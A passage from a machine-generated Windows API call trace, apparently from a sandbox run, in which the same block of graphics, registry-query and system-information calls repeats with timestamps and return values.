hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.830] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.830] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.830] BeginPath (hdc=0x0) returned 0 [0087.830] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.830] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.830] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.830] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.830] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.830] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.830] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.830] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.830] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8b0401d6 [0087.830] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8d0401d3 [0087.830] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c69 [0087.830] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c6a [0087.830] CombineRgn (hrgnDst=0x1040c69, hrgnSrc1=0x8b0401d6, hrgnSrc2=0x8d0401d3, iMode=1) returned 1 [0087.830] CombineRgn (hrgnDst=0x1040c6a, hrgnSrc1=0x8b0401d6, hrgnSrc2=0x8d0401d3, iMode=4) returned 2 [0087.830] CreateSolidBrush (color=0xff) returned 0x2100c68 [0087.830] CreateSolidBrush (color=0xff0000) returned 0x1100c6b [0087.830] DeleteObject (ho=0x1100c6b) returned 1 [0087.830] DeleteObject (ho=0x8d0401d3) returned 1 [0087.830] DeleteObject (ho=0x8b0401d6) returned 1 [0087.830] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.830] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.830] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.830] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.830] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.830] BeginPath (hdc=0x0) returned 0 [0087.830] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.830] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.830] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.830] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.830] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.830] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.831] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.831] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.831] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8e0401d3 [0087.831] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8c0401d6 [0087.831] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c6c [0087.831] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c6d [0087.831] CombineRgn (hrgnDst=0x1040c6c, hrgnSrc1=0x8e0401d3, hrgnSrc2=0x8c0401d6, iMode=1) returned 1 [0087.831] CombineRgn (hrgnDst=0x1040c6d, hrgnSrc1=0x8e0401d3, hrgnSrc2=0x8c0401d6, iMode=4) returned 2 [0087.831] CreateSolidBrush (color=0xff) returned 0x2100c6b [0087.831] CreateSolidBrush (color=0xff0000) returned 0x1100c6e [0087.831] DeleteObject (ho=0x1100c6e) returned 1 [0087.831] DeleteObject (ho=0x8c0401d6) returned 1 [0087.831] DeleteObject (ho=0x8e0401d3) returned 1 [0087.831] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.831] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.831] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.831] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.831] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.831] BeginPath (hdc=0x0) returned 0 [0087.831] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.831] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.831] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.831] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.831] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.831] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.831] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.831] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.831] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8d0401d6 [0087.831] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8f0401d3 [0087.832] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c6f [0087.832] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c70 [0087.832] CombineRgn (hrgnDst=0x1040c6f, hrgnSrc1=0x8d0401d6, hrgnSrc2=0x8f0401d3, iMode=1) returned 1 [0087.832] CombineRgn (hrgnDst=0x1040c70, hrgnSrc1=0x8d0401d6, hrgnSrc2=0x8f0401d3, iMode=4) returned 2 [0087.832] CreateSolidBrush (color=0xff) returned 0x2100c6e [0087.832] CreateSolidBrush (color=0xff0000) returned 0x1100c71 [0087.832] DeleteObject (ho=0x1100c71) returned 1 [0087.832] DeleteObject (ho=0x8f0401d3) returned 1 [0087.832] DeleteObject (ho=0x8d0401d6) returned 1 [0087.832] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.832] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.832] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.832] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.832] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.832] BeginPath (hdc=0x0) returned 0 [0087.832] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.832] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.832] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.832] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.832] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.832] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.832] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.832] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.832] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x900401d3 [0087.832] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8e0401d6 [0087.832] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c72 [0087.832] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c73 [0087.832] CombineRgn (hrgnDst=0x1040c72, hrgnSrc1=0x900401d3, hrgnSrc2=0x8e0401d6, iMode=1) returned 1 [0087.832] CombineRgn (hrgnDst=0x1040c73, hrgnSrc1=0x900401d3, hrgnSrc2=0x8e0401d6, iMode=4) returned 2 [0087.832] CreateSolidBrush (color=0xff) returned 0x2100c71 [0087.832] CreateSolidBrush (color=0xff0000) returned 0x1100c74 [0087.832] DeleteObject (ho=0x1100c74) returned 1 [0087.832] DeleteObject (ho=0x8e0401d6) returned 1 [0087.832] DeleteObject (ho=0x900401d3) returned 1 [0087.832] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.832] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.832] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.833] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.833] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.833] BeginPath (hdc=0x0) returned 0 [0087.833] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.833] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.833] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.833] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.833] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.833] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.833] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.833] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.833] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8f0401d6 [0087.833] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x910401d3 [0087.833] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c75 [0087.833] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c76 [0087.833] CombineRgn (hrgnDst=0x1040c75, hrgnSrc1=0x8f0401d6, hrgnSrc2=0x910401d3, iMode=1) returned 1 [0087.833] CombineRgn (hrgnDst=0x1040c76, hrgnSrc1=0x8f0401d6, hrgnSrc2=0x910401d3, iMode=4) returned 2 [0087.833] CreateSolidBrush (color=0xff) returned 0x2100c74 [0087.833] CreateSolidBrush (color=0xff0000) returned 0x1100c77 [0087.833] DeleteObject (ho=0x1100c77) returned 1 [0087.833] DeleteObject (ho=0x910401d3) returned 1 [0087.833] DeleteObject (ho=0x8f0401d6) returned 1 [0087.833] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.833] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.833] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.833] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.833] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.833] BeginPath (hdc=0x0) returned 0 [0087.833] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.833] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.833] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.833] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.833] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.833] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.833] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.833] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.834] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x920401d3 [0087.834] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x900401d6 [0087.834] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c78 [0087.834] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c79 [0087.834] CombineRgn (hrgnDst=0x1040c78, hrgnSrc1=0x920401d3, hrgnSrc2=0x900401d6, iMode=1) returned 1 [0087.834] CombineRgn (hrgnDst=0x1040c79, hrgnSrc1=0x920401d3, hrgnSrc2=0x900401d6, iMode=4) returned 2 [0087.834] CreateSolidBrush (color=0xff) returned 0x2100c77 [0087.834] CreateSolidBrush (color=0xff0000) returned 0x1100c7a [0087.834] DeleteObject (ho=0x1100c7a) returned 1 [0087.834] DeleteObject (ho=0x900401d6) returned 1 [0087.834] DeleteObject (ho=0x920401d3) returned 1 [0087.834] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.834] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.834] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.834] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.834] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.834] BeginPath (hdc=0x0) returned 0 [0087.834] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.834] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.834] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.834] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.834] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.834] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.834] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.834] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.834] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x910401d6 [0087.834] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x930401d3 [0087.834] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c7b [0087.834] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c7c [0087.834] CombineRgn (hrgnDst=0x1040c7b, hrgnSrc1=0x910401d6, hrgnSrc2=0x930401d3, iMode=1) returned 1 [0087.834] CombineRgn (hrgnDst=0x1040c7c, hrgnSrc1=0x910401d6, hrgnSrc2=0x930401d3, iMode=4) returned 2 [0087.834] CreateSolidBrush (color=0xff) returned 0x2100c7a [0087.834] CreateSolidBrush (color=0xff0000) returned 0x1100c7d [0087.834] DeleteObject (ho=0x1100c7d) returned 1 [0087.834] DeleteObject (ho=0x930401d3) returned 1 [0087.834] DeleteObject (ho=0x910401d6) returned 1 [0087.835] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.835] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.835] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.835] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.835] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.835] BeginPath (hdc=0x0) returned 0 [0087.835] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.835] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.835] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.835] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.835] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.835] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.835] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.835] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.835] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x940401d3 [0087.835] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x920401d6 [0087.835] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c7e [0087.835] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c7f [0087.835] CombineRgn (hrgnDst=0x1040c7e, hrgnSrc1=0x940401d3, hrgnSrc2=0x920401d6, iMode=1) returned 1 [0087.835] CombineRgn (hrgnDst=0x1040c7f, hrgnSrc1=0x940401d3, hrgnSrc2=0x920401d6, iMode=4) returned 2 [0087.835] CreateSolidBrush (color=0xff) returned 0x2100c7d [0087.835] CreateSolidBrush (color=0xff0000) returned 0x1100c80 [0087.835] DeleteObject (ho=0x1100c80) returned 1 [0087.835] DeleteObject (ho=0x920401d6) returned 1 [0087.835] DeleteObject (ho=0x940401d3) returned 1 [0087.835] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.835] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.835] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.835] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.835] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.835] BeginPath (hdc=0x0) returned 0 [0087.835] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.835] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.835] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.835] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.835] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.836] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.836] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.836] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.836] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x930401d6 [0087.836] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x950401d3 [0087.836] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c81 [0087.836] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c82 [0087.836] CombineRgn (hrgnDst=0x1040c81, hrgnSrc1=0x930401d6, hrgnSrc2=0x950401d3, iMode=1) returned 1 [0087.836] CombineRgn (hrgnDst=0x1040c82, hrgnSrc1=0x930401d6, hrgnSrc2=0x950401d3, iMode=4) returned 2 [0087.836] CreateSolidBrush (color=0xff) returned 0x2100c80 [0087.836] CreateSolidBrush (color=0xff0000) returned 0x1100c83 [0087.836] DeleteObject (ho=0x1100c83) returned 1 [0087.836] DeleteObject (ho=0x950401d3) returned 1 [0087.836] DeleteObject (ho=0x930401d6) returned 1 [0087.836] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.836] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.836] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.836] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.836] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.836] BeginPath (hdc=0x0) returned 0 [0087.836] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.836] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.836] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.836] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.836] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.836] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.836] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, 